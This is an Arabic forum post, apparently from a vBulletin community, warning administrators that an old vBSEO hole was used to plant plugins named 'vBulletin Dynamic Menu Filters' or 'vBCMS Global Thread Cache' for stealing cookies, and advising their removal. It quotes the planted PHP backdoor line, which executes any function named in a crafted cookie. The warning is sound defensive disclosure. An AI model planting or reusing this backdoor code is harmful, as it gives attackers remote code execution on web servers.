السلام عليكم ورحمة الله
ثغرة vbseo قديمة ولم ننتبه لها للاسف .
الثغرة كانت متداولة اكثر من 3 اشهر ومن ضمن استغلالها زراعة اضافة لسرقة الكواكيز.
ادخل على لوحة التحكم - التحكم بالإضافات البرمجية Plugin - اذا وجدت "vBulletin Dynamic Menu Filters" أو "vBCMS Global Thread Cache"
احذفها فورا
Code:(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
هل هذا الثغرة مازلت موجود بعد التحديث الجديد
وشكرا


LinkBack URL
About LinkBacks





